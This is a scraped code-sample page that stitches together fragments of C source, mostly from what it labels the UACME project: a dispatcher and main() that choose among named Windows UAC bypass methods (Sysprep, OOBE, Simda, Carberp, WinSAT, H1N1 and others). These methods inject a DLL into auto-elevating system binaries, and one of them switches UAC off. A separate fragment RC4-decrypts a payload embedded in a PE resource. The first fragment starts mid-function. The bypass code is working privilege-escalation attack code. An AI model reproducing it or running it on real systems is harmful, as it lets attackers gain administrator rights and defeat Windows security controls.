			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_OOBE://oobe service
		if (g_ldp.osver.dwBuildNumber >= 10548) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_REDIRECTEXE:
		if (g_ldp.osver.dwBuildNumber > 9600) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}

#ifdef _WIN64
		ucmShowMessage(WOW64WIN32ONLY);
		return ERROR_UNSUPPORTED_TYPE;
#endif
		break;

	case METHOD_SIMDA:
		if (g_ldp.osver.dwBuildNumber >= 10136) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_CARBERP:
		if (g_ldp.osver.dwBuildNumber >= 10147) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_CARBERP_EX:
		if (g_ldp.osver.dwBuildNumber >= 10147) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_TILON:
		if (g_ldp.osver.dwBuildNumber > 9200) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_AVRF:
		if (g_ldp.osver.dwBuildNumber >= 10136) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_WINSAT:
		if (g_ldp.osver.dwBuildNumber >= 10548) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_SHIMPATCH:
		if (g_ldp.osver.dwBuildNumber > 9600) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}

#ifdef _WIN64
		ucmShowMessage(WOW64WIN32ONLY);
		return ERROR_UNSUPPORTED_TYPE;
#endif		
		break;

	case METHOD_MMC:
		break;

	case METHOD_H1N1:
		if (g_ldp.osver.dwBuildNumber >= 10548) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_GENERIC:
		break;

	}

	//prepare command for payload
	paramLen = 0;
	RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
	GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, &paramLen);
	if (paramLen > 0) {
		if (dwType != METHOD_REDIRECTEXE) {
			supSetParameter((LPWSTR)&szBuffer, paramLen * sizeof(WCHAR));
		}
	}

	switch (dwType) {

	case METHOD_SYSPREP1:
	case METHOD_SYSPREP2:
	case METHOD_SYSPREP3:
	case METHOD_OOBE:
	case METHOD_TILON:

		//
		// Since we are using injection and not using heavens gate/syswow64, we should ban usage under wow64.
		//
#ifndef _DEBUG
		if (g_ldp.IsWow64) {
			ucmShowMessage(WOW64STRING);
			return ERROR_UNSUPPORTED_TYPE;
		}
#endif
		if (ucmStandardAutoElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
		}
		break;

//
//  Allow only in 32 version.
//
#ifndef _WIN64
	case METHOD_REDIRECTEXE:
	case METHOD_SHIMPATCH:
		if (ucmAppcompatElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL), (paramLen != 0) ? szBuffer : NULL )) {
			OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
		}
		break;
#endif
	case METHOD_SIMDA:

		//
		// Since we are using injection and not using heavens gate, we should ban usage under wow64.
		//
#ifndef _DEBUG
		if (g_ldp.IsWow64) {
			ucmShowMessage(WOW64STRING);
			return ERROR_UNSUPPORTED_TYPE;
		}
#endif
		if (MessageBox(GetDesktopWindow(),
			TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
			PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES) 
		{
			if (ucmSimdaTurnOffUac()) {
				OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
			}
		}
		break;

	case METHOD_CARBERP:
	case METHOD_CARBERP_EX:

		if (dwType == METHOD_CARBERP) {

			//there is no migmiz in syswow64 in 8+
			if ((g_ldp.IsWow64) && (g_ldp.osver.dwBuildNumber > 7601)) {
				ucmShowMessage(WOW64STRING);
				return ERROR_UNSUPPORTED_TYPE;
			}
		}

		if (dwType == METHOD_CARBERP_EX) {
#ifndef _DEBUG
			if (g_ldp.IsWow64) {
				ucmShowMessage(WOW64STRING);
				return ERROR_UNSUPPORTED_TYPE;
			}
#endif
		}

		if (ucmWusaMethod(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
		}
		break;

	case METHOD_AVRF:
#ifndef _DEBUG
		if (g_ldp.IsWow64) {
			ucmShowMessage(WOW64STRING);
			return ERROR_UNSUPPORTED_TYPE;
		}
#endif
		if (ucmAvrfMethod((CONST PVOID)AVRFDLL, sizeof(AVRFDLL))) {
			OutputDebugString(TEXT("[UCM] AVrf method called\n\r"));
		}	
		break;

	case METHOD_WINSAT:
		//
		// Decoding WOW64 environment, turning wow64fs redirection is meeh. Just drop it as it just a test tool.
		//
		if (g_ldp.IsWow64) {
			ucmShowMessage(LAZYWOW64UNSUPPORTED);
			return ERROR_UNSUPPORTED_TYPE;
		}

		if (g_ldp.osver.dwBuildNumber < 9200) {
			p = L"powrprof.dll";
		}
		else {
			p = L"devobj.dll";
		}

		if (ucmWinSATMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL), (g_ldp.osver.dwBuildNumber <= 10136))) {
			OutputDebugString(TEXT("[UCM] WinSAT method called\n\r"));
		}
		break;

	case METHOD_MMC:
		if (g_ldp.IsWow64) {
			ucmShowMessage(WOW64STRING);
			return ERROR_UNSUPPORTED_TYPE;
		}
		p = L"elsext.dll";
		if (ucmMMCMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] MMC method called\n\r"));
		}
		break;

	case METHOD_H1N1:
		if (g_ldp.IsWow64) {
			ucmShowMessage(WOW64STRING);
			return ERROR_UNSUPPORTED_TYPE;
		}

		if (ucmH1N1Method((CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] H1N1 method called\n\r"));
		}
		break;

	case METHOD_GENERIC:
		if (g_ldp.IsWow64) {
			ucmShowMessage(WOW64STRING);
			return ERROR_UNSUPPORTED_TYPE;
		}

		p = L"ntwdblib.dll";

		if (ucmGenericAutoelevation(
			METHOD_SQLSRV_TARGETAPP,
			p, 
			(CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) 
		{
			OutputDebugString(TEXT("[UCM] Generic method called\n\r"));
		}
		break;

	}
	
	return ERROR_SUCCESS;
}
示例#8
0
文件: main.c 项目: DragonStuff/UACME
/*
* main
*
* Purpose:
*
* Program entry point.
*
*/
VOID main()
{
	BOOL					IsWow64 = FALSE;
	DWORD					bytesIO, dwType;
	WCHAR					*p;
	WCHAR					szBuffer[MAX_PATH + 1];
	TOKEN_ELEVATION_TYPE	ElevType;
	RTL_OSVERSIONINFOW		osver;

	//verify system version
	RtlSecureZeroMemory(&osver, sizeof(osver));
	osver.dwOSVersionInfoSize = sizeof(osver);
	RtlGetVersion(&osver);

	if (osver.dwBuildNumber < 7000) {

		MessageBox(GetDesktopWindow(),
			TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION);

		goto Done;
	}

	ElevType = TokenElevationTypeDefault;
	if (!supGetElevationType(&ElevType)) {
		goto Done;
	}
	if (ElevType != TokenElevationTypeLimited) {
		MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."), 
			PROGRAMTITLE, MB_ICONINFORMATION);
		goto Done;
	}

	IsWow64 = supIsProcess32bit(GetCurrentProcess());

	dwType = 0;
	bytesIO = 0;
	RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
	if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) {

		dwType = strtoul(szBuffer);
		switch (dwType) {

		case METHOD_SYSPREP:
			OutputDebugString(TEXT("[UCM] Sysprep\n\r"));
			if (osver.dwBuildNumber > 9200) {
				MessageBox(GetDesktopWindow(), WINPREBLUE,
					PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}
			break;

		case METHOD_SYSPREP_EX:
			OutputDebugString(TEXT("[UCM] Sysprep_ex\n\r"));
			if (osver.dwBuildNumber < 9600) {
				MessageBox(GetDesktopWindow(), WINBLUEONLY,
					PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}
			break;

		case METHOD_OOBE:
			OutputDebugString(TEXT("[UCM] Oobe\n\r"));
			break;

		case METHOD_REDIRECTEXE:
			OutputDebugString(TEXT("[UCM] AppCompat RedirectEXE\n\r"));

#ifdef _WIN64
			MessageBox(GetDesktopWindow(), WOW64WIN32ONLY,
				PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
#endif
			break;

		case METHOD_SIMDA:
			OutputDebugString(TEXT("[UCM] Simda\n\r"));
			break;

		case METHOD_CARBERP:
			OutputDebugString(TEXT("[UCM] Carberp\n\r"));
			break;

		case METHOD_CARBERP_EX:
			OutputDebugString(TEXT("[UCM] Carberp_ex\n\r"));
			break;

		case METHOD_TILON:
			OutputDebugString(TEXT("[UCM] Tilon\n\r"));
			if (osver.dwBuildNumber > 9200) {
				MessageBox(GetDesktopWindow(), WINPREBLUE,
					PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}
			break;

		case METHOD_AVRF:
			OutputDebugString(TEXT("[UCM] AVrf\n\r"));
			break;

		case METHOD_WINSAT:
			OutputDebugString(TEXT("[UCM] WinSAT\n\r"));
			break;

		case METHOD_SHIMPATCH:
			OutputDebugString(TEXT("[UCM] AppCompat Shim Patch\n\r"));

#ifdef _WIN64
			MessageBox(GetDesktopWindow(), WOW64WIN32ONLY,
				PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
#endif		
			break;

		}
	}


	switch (dwType) {

	case METHOD_SYSPREP:
	case METHOD_SYSPREP_EX:
	case METHOD_OOBE:
	case METHOD_TILON:

		//
		// Since we are using injection and not using heavens gate, we should ban usage under wow64.
		//
#ifndef _DEBUG
		if (IsWow64) {
			MessageBox(GetDesktopWindow(),
				WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}
#endif
		if (ucmStandardAutoElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
		}
		break;

//
//  Allow only in 32 version.
//
#ifndef _WIN64
	case METHOD_REDIRECTEXE:
	case METHOD_SHIMPATCH:
		if (ucmAppcompatElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
		}
		break;
#endif
	case METHOD_SIMDA:

		//
		// Since we are using injection and not using heavens gate, we should ban usage under wow64.
		//
#ifndef _DEBUG
		if (IsWow64) {
			MessageBox(GetDesktopWindow(),
				WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}
#endif
		if (MessageBox(GetDesktopWindow(),
			TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
			PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES) 
		{
			if (ucmSimdaTurnOffUac()) {
				OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
			}
		}
		break;

	case METHOD_CARBERP:
	case METHOD_CARBERP_EX:

		if (dwType == METHOD_CARBERP) {

			if (osver.dwBuildNumber > 9600) {
				MessageBox(GetDesktopWindow(),
					TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}

			//there is no migmiz in syswow64 in 8+
			if ((IsWow64) && (osver.dwBuildNumber > 7601)) {
				MessageBox(GetDesktopWindow(),
					WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}
		}

		if (dwType == METHOD_CARBERP_EX) {
#ifndef _DEBUG
			if (IsWow64) {
				MessageBox(GetDesktopWindow(),
					WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}
#endif
		}


		if (ucmWusaMethod(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
		}
		break;

	case METHOD_AVRF:
#ifndef _DEBUG
		if (IsWow64) {
			MessageBox(GetDesktopWindow(),
				WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}
#endif
		if (ucmAvrfMethod((CONST PVOID)AVRFDLL, sizeof(AVRFDLL))) {
			OutputDebugString(TEXT("[UCM] AVrf method called\n\r"));
		}	
		break;

	case METHOD_WINSAT:
		//
		// Decoding WOW64 environment, turning wow64fs redirection is meeh. Just drop it as it just a test tool.
		//
		if (IsWow64) {
			MessageBox(GetDesktopWindow(),
				TEXT("Use 32 bit version of this tool on 32 bit OS version"), PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}

		if (osver.dwBuildNumber < 9200) {
			p = L"powrprof.dll";
		}
		else {
			p = L"devobj.dll";
		}

		if (ucmWinSATMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] WinSAT method called\n\r"));
		}
		break;
	}

Done:
	ExitProcess(0);
}
示例#9
0
UINT SfDecryptPayload(
	LPWSTR lpParameter
	)
{
	BOOL                cond = FALSE, bSuccess = FALSE;
	PBYTE               cng_object, hashdata, decrypted, enc_data, extracted;
	ULONG               obj_sz, rlen, hdatasz, enc_data_size;
	BCRYPT_ALG_HANDLE   h_alg = NULL;
	BCRYPT_HASH_HANDLE  h_hash = NULL;
	BCRYPT_KEY_HANDLE   h_rc4key = NULL;
	NTSTATUS            status;
	HANDLE              pheap = NULL;
	PIMAGE_FILE_HEADER  fheader;
	PVOID               pdll = NULL;
	WCHAR               InputFile[MAX_PATH + 1], OutputFile[MAX_PATH + 1];

	rlen = 0;
	RtlSecureZeroMemory(InputFile, sizeof(InputFile));
	GetCommandLineParam(lpParameter, 1, InputFile, MAX_PATH, &rlen);
	if (rlen == 0) {
		SfcuiPrintText(g_ConOut,
			T_SFDECRYPTUSAGE,
			g_ConsoleOutput, FALSE);
		return (UINT)-1;
	}

	do {

		rlen = 0;
		GetCommandLineParam(lpParameter, 2, OutputFile, MAX_PATH, &rlen);
		
		if (rlen == 0)
			_strcpy(OutputFile, TEXT("out.bin"));
		
		pdll = SfuCreateFileMappingNoExec(InputFile);
		if (pdll == NULL)
			break;

		enc_data_size = 0;
		enc_data = SfuQueryResourceData(2, pdll, &enc_data_size);
		if (enc_data == NULL)
			break;

		fheader = &(RtlImageNtHeader(pdll)->FileHeader);

		status = BCryptOpenAlgorithmProvider(&h_alg, BCRYPT_MD5_ALGORITHM, NULL, 0);
		if (!NT_SUCCESS(status))
			break;
		obj_sz = 0;
		rlen = 0;
		status = BCryptGetProperty(h_alg, BCRYPT_OBJECT_LENGTH, (PUCHAR)&obj_sz, sizeof(obj_sz), &rlen, 0);
		if (!NT_SUCCESS(status))
			break;

		hdatasz = 0;
		rlen = 0;
		status = BCryptGetProperty(h_alg, BCRYPT_HASH_LENGTH, (PUCHAR)&hdatasz, sizeof(hdatasz), &rlen, 0);
		if (!NT_SUCCESS(status))
			break;

		pheap = HeapCreate(0, 0, 0);
		if (pheap == NULL)
			break;

		cng_object = HeapAlloc(pheap, HEAP_ZERO_MEMORY, obj_sz);
		if (cng_object == NULL)
			break;

		hashdata = HeapAlloc(pheap, HEAP_ZERO_MEMORY, hdatasz);
		if (hashdata == NULL)
			break;

		status = BCryptCreateHash(h_alg, &h_hash, cng_object, obj_sz, NULL, 0, 0);
		if (!NT_SUCCESS(status))
			break;

		status = BCryptHashData(h_hash, (PUCHAR)fheader, sizeof(IMAGE_FILE_HEADER), 0);
		if (!NT_SUCCESS(status))
			break;

		status = BCryptFinishHash(h_hash, hashdata, hdatasz, 0);
		if (!NT_SUCCESS(status))
			break;

		BCryptDestroyHash(h_hash);
		BCryptCloseAlgorithmProvider(h_alg, 0);
		HeapFree(pheap, 0, cng_object);
		h_alg = NULL;
		h_hash = NULL;

		status = BCryptOpenAlgorithmProvider(&h_alg, BCRYPT_RC4_ALGORITHM, NULL, 0);
		if (!NT_SUCCESS(status))
			break;

		obj_sz = 0;
		rlen = 0;
		status = BCryptGetProperty(h_alg, BCRYPT_OBJECT_LENGTH, (PUCHAR)&obj_sz, sizeof(obj_sz), &rlen, 0);
		if (!NT_SUCCESS(status))
			break;

		cng_object = HeapAlloc(pheap, HEAP_ZERO_MEMORY, obj_sz);
		if (cng_object == NULL)
			break;

		status = BCryptGenerateSymmetricKey(h_alg, &h_rc4key, cng_object, obj_sz, hashdata, hdatasz, 0);
		if (!NT_SUCCESS(status))
			break;

		decrypted = HeapAlloc(pheap, HEAP_ZERO_MEMORY, enc_data_size);
		if (decrypted == NULL)
			break;

		rlen = 0;
		status = BCryptEncrypt(h_rc4key, enc_data, enc_data_size, NULL, NULL, 0, decrypted, enc_data_size, &rlen, 0);
		if (!NT_SUCCESS(status))
			break;

		bSuccess = FALSE;
		enc_data_size = rlen;
		rlen = 0;
		extracted = SfcabExtractMemory(decrypted, enc_data_size, &rlen);
		if (extracted) {

			if (SfuWriteBufferToFile(OutputFile, extracted, rlen, FALSE, FALSE) == rlen) {
				bSuccess = TRUE;
			}
			LocalFree(extracted);
		}
		else {
			//failed to extract, drop cab as is
			if (SfuWriteBufferToFile(OutputFile, decrypted, enc_data_size, FALSE, FALSE) == enc_data_size) {
				bSuccess = TRUE;
			}
		}

		if (bSuccess) {

			SfcuiPrintText(g_ConOut,
				T_SFDECRYPTED,
				g_ConsoleOutput, FALSE);

			SfcuiPrintText(g_ConOut,
				OutputFile,
				g_ConsoleOutput, FALSE);
		}

	} while (cond);

	if (bSuccess == FALSE) {

		SfcuiPrintText(g_ConOut,
			T_SFDECRYPTFAIL,
			g_ConsoleOutput, FALSE);
		
	}

	if (h_rc4key != NULL)
		BCryptDestroyKey(h_rc4key);

	if (h_hash != NULL)
		BCryptDestroyHash(h_hash);

	if (h_alg != NULL)
		BCryptCloseAlgorithmProvider(h_alg, 0);

	if (pheap != NULL)
		HeapDestroy(pheap);

	if (pdll != 0)
		NtUnmapViewOfSection(NtCurrentProcess(), (PVOID)pdll);

	return 0;
}